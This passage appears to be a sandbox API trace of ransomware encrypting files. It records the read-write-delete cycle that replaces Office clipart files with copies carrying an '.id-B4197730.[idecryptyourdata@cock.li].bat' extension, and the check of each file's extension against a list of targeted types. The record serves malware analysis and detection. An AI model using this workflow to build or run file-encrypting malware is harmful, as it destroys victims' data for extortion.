dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0062.986] GetLastError () returned 0x0 [0062.986] ReadFile (in: hFile=0x2c8, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0xfe2, lpOverlapped=0x0) returned 1 [0062.996] WriteFile (in: hFile=0x354, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xff0, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xff0, lpOverlapped=0x0) returned 1 [0062.997] ReadFile (in: hFile=0x2c8, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0062.997] WriteFile (in: hFile=0x354, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0062.997] SetEndOfFile (hFile=0x354) returned 1 [0062.998] CloseHandle (hObject=0x354) returned 1 [0062.998] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0062.998] SetEndOfFile (hFile=0x2c8) returned 1 [0062.999] CloseHandle (hObject=0x2c8) returned 1 [0062.999] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07831_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0062.999] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07831_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd07831_.wmf")) returned 1 [0063.000] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07831_.WMF") returned 68 [0063.000] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07831_.WMF") returned 68 [0063.000] lstrlenW (lpString=".doc") returned 4 [0063.000] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0063.000] lstrlenW (lpString=".docx") returned 5 [0063.000] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0063.000] lstrlenW (lpString=".pdf") returned 4 [0063.000] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0063.000] lstrlenW (lpString=".xls") returned 4 [0063.000] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0063.000] lstrlenW (lpString=".xlsx") returned 5 [0063.000] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0063.000] lstrlenW (lpString=".ppt") returned 4 [0063.000] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0063.000] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07831_.WMF") returned 68 [0063.000] lstrlenW (lpString=".zip") returned 4 [0063.000] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0063.000] lstrlenW (lpString=".rar") returned 4 [0063.000] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0063.000] lstrlenW (lpString=".bz2") returned 4 [0063.000] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0063.000] lstrlenW (lpString=".7z") returned 3 [0063.000] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0063.000] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07831_.WMF") returned 68 [0063.000] lstrlenW (lpString=".dbf") returned 4 [0063.000] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0063.000] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07831_.WMF") returned 68 [0063.000] lstrlenW (lpString=".1cd") returned 4 [0063.000] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0063.000] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07831_.WMF") returned 68 [0063.000] lstrlenW (lpString=".jpg") returned 4 [0063.000] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0063.001] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0063.001] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0063.001] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08773_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd08773_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0063.001] GetLastError () returned 0x0 [0063.001] ReadFile (in: hFile=0x2c8, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x60ca, lpOverlapped=0x0) returned 1 [0063.038] WriteFile (in: hFile=0x354, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x60d0, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x60d0, lpOverlapped=0x0) returned 1 [0063.039] ReadFile (in: hFile=0x2c8, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0063.039] WriteFile (in: hFile=0x354, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0063.039] SetEndOfFile (hFile=0x354) returned 1 [0063.039] CloseHandle (hObject=0x354) returned 1 [0063.040] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0063.041] SetEndOfFile (hFile=0x2c8) returned 1 [0063.041] CloseHandle (hObject=0x2c8) returned 1 [0063.042] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08773_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0063.042] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08773_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd08773_.wmf")) returned 1 [0063.042] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08773_.WMF") returned 68 [0063.042] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08773_.WMF") returned 68 [0063.042] lstrlenW (lpString=".doc") returned 4 [0063.042] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0063.042] lstrlenW (lpString=".docx") returned 5 [0063.042] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0063.042] lstrlenW (lpString=".pdf") returned 4 [0063.042] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0063.042] lstrlenW (lpString=".xls") returned 4 [0063.043] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0063.043] lstrlenW (lpString=".xlsx") returned 5 [0063.043] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0063.043] lstrlenW (lpString=".ppt") returned 4 [0063.043] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0063.043] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08773_.WMF") returned 68 [0063.043] lstrlenW (lpString=".zip") returned 4 [0063.043] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0063.043] lstrlenW (lpString=".rar") returned 4 [0063.043] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0063.043] lstrlenW (lpString=".bz2") returned 4 [0063.043] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0063.043] lstrlenW (lpString=".7z") returned 3 [0063.043] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0063.043] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08773_.WMF") returned 68 [0063.043] lstrlenW (lpString=".dbf") returned 4 [0063.043] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0063.043] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08773_.WMF") returned 68 [0063.043] lstrlenW (lpString=".1cd") returned 4 [0063.043] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0063.043] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08773_.WMF") returned 68 [0063.043] lstrlenW (lpString=".jpg") returned 4 [0063.043] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0063.044] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0063.044] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0063.044] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08808_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd08808_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0063.044] GetLastError () returned 0x0 [0063.044] ReadFile (in: hFile=0x2c8, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0xbb7c, lpOverlapped=0x0) returned 1 [0063.055] WriteFile (in: hFile=0x354, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xbb80, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xbb80, lpOverlapped=0x0) returned 1 [0063.056] ReadFile (in: hFile=0x2c8, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0063.056] WriteFile (in: hFile=0x354, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0063.056] SetEndOfFile (hFile=0x354) returned 1 [0063.056] CloseHandle (hObject=0x354) returned 1 [0063.057] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0063.058] SetEndOfFile (hFile=0x2c8) returned 1 [0063.058] CloseHandle (hObject=0x2c8) returned 1 [0063.059] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08808_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0063.059] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08808_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd08808_.wmf")) returned 1 [0063.059] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08808_.WMF") returned 68 [0063.059] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08808_.WMF") returned 68 [0063.059] lstrlenW (lpString=".doc") returned 4 [0063.059] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0063.059] lstrlenW (lpString=".docx") returned 5 [0063.059] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0063.059] lstrlenW (lpString=".pdf") returned 4 [0063.059] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0063.059] lstrlenW (lpString=".xls") returned 4 [0063.059] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0063.059] lstrlenW (lpString=".xlsx") returned 5 [0063.059] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0063.059] lstrlenW (lpString=".ppt") returned 4 [0063.059] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0063.059] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08808_.WMF") returned 68 [0063.059] lstrlenW (lpString=".zip") returned 4 [0063.060] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0063.060] lstrlenW (lpString=".rar") returned 4 [0063.060] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0063.060] lstrlenW (lpString=".bz2") returned 4 [0063.060] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0063.060] lstrlenW (lpString=".7z") returned 3 [0063.060] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0063.060] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08808_.WMF") returned 68 [0063.060] lstrlenW (lpString=".dbf") returned 4 [0063.060] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0063.060] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08808_.WMF") returned 68 [0063.060] lstrlenW (lpString=".1cd") returned 4 [0063.060] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0063.060] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08808_.WMF") returned 68 [0063.060] lstrlenW (lpString=".jpg") returned 4 [0063.060] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0063.067] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0063.067] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0063.067] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09031_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd09031_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0063.068] GetLastError () returned 0x0 [0063.068] ReadFile (in: hFile=0x368, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0xbaaa, lpOverlapped=0x0) returned 1 [0063.079] WriteFile (in: hFile=0x344, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xbab0, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xbab0, lpOverlapped=0x0) returned 1 [0063.081] ReadFile (in: hFile=0x368, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0063.081] WriteFile (in: hFile=0x344, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0063.081] SetEndOfFile (hFile=0x344) returned 1 [0063.081] CloseHandle (hObject=0x344) returned 1 [0063.082] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0063.082] SetEndOfFile (hFile=0x368) returned 1 [0063.083] CloseHandle (hObject=0x368) returned 1 [0063.084] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09031_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0063.084] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09031_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd09031_.wmf")) returned 1 [0063.084] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09031_.WMF") returned 68 [0063.084] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09031_.WMF") returned 68 [0063.084] lstrlenW (lpString=".doc") returned 4 [0063.084] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0063.084] lstrlenW (lpString=".docx") returned 5 [0063.084] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0063.084] lstrlenW (lpString=".pdf") returned 4 [0063.084] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0063.084] lstrlenW (lpString=".xls") returned 4 [0063.084] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0063.084] lstrlenW (lpString=".xlsx") returned 5 [0063.084] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0063.084] lstrlenW (lpString=".ppt") returned 4 [0063.084] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0063.085] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09031_.WMF") returned 68 [0063.085] lstrlenW (lpString=".zip") returned 4 [0063.085] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0063.085] lstrlenW (lpString=".rar") returned 4 [0063.085] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0063.085] lstrlenW (lpString=".bz2") returned 4 [0063.085] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0063.085] lstrlenW (lpString=".7z") returned 3 [0063.085] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0063.085] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09031_.WMF") returned 68 [0063.085] lstrlenW (lpString=".dbf") returned 4 [0063.085] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0063.085] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09031_.WMF") returned 68 [0063.085] lstrlenW (lpString=".1cd") returned 4 [0063.085] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0063.085] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09031_.WMF") returned 68 [0063.085] lstrlenW (lpString=".jpg") returned 4 [0063.085] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0063.086] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0063.086] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0063.086] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09194_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd09194_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0063.086] GetLastError () returned 0x0 [0063.086] ReadFile (in: hFile=0x368, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x38cc, lpOverlapped=0x0) returned 1 [0063.088] WriteFile (in: hFile=0x344, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x38d0, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x38d0, lpOverlapped=0x0) returned 1 [0063.089] ReadFile (in: hFile=0x368, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0063.089] WriteFile (in: hFile=0x344, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0063.089] SetEndOfFile (hFile=0x344) returned 1 [0063.090] CloseHandle (hObject=0x344) returned 1 [0063.090] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0063.090] SetEndOfFile (hFile=0x368) returned 1 [0063.091] CloseHandle (hObject=0x368) returned 1 [0063.091] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09194_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0063.092] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09194_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd09194_.wmf")) returned 1 [0063.092] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09194_.WMF") returned 68 [0063.092] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09194_.WMF") returned 68 [0063.092] lstrlenW (lpString=".doc") returned 4 [0063.092] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0063.092] lstrlenW (lpString=".docx") returned 5 [0063.092] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0063.092] lstrlenW (lpString=".pdf") returned 4 [0063.092] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0063.092] lstrlenW (lpString=".xls") returned 4 [0063.092] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0063.092] lstrlenW (lpString=".xlsx") returned 5 [0063.092] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0063.092] lstrlenW (lpString=".ppt") returned 4 [0063.092] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0063.092] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09194_.WMF") returned 68 [0063.092] lstrlenW (lpString=".zip") returned 4 [0063.092] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0063.092] lstrlenW (lpString=".rar") returned 4 [0063.092] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0063.092] lstrlenW (lpString=".bz2") returned 4 [0063.092] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0063.092] lstrlenW (lpString=".7z") returned 3 [0063.092] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0063.092] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09194_.WMF") returned 68 [0063.092] lstrlenW (lpString=".dbf") returned 4 [0063.093] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0063.093] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09194_.WMF") returned 68 [0063.093] lstrlenW (lpString=".1cd") returned 4 [0063.093] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0063.093] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09194_.WMF") returned 68 [0063.093] lstrlenW (lpString=".jpg") returned 4 [0063.093] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0063.093] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0063.093] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0063.093] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09662_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd09662_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0063.093] GetLastError () returned 0x0 [0063.093] ReadFile (in: hFile=0x368, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x504a, lpOverlapped=0x0) returned 1 [0063.095] WriteFile (in: hFile=0x344, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x5050, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x5050, lpOverlapped=0x0) returned 1 [0063.096] ReadFile (in: hFile=0x368, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0063.096] WriteFile (in: hFile=0x344, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0063.096] SetEndOfFile (hFile=0x344) returned 1 [0063.096] CloseHandle (hObject=0x344) returned 1 [0063.097] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0063.097] SetEndOfFile (hFile=0x368) returned 1 [0063.098] CloseHandle (hObject=0x368) returned 1 [0063.098] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09662_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0063.098] DeleteFileW (lpFileName="C:\\Program 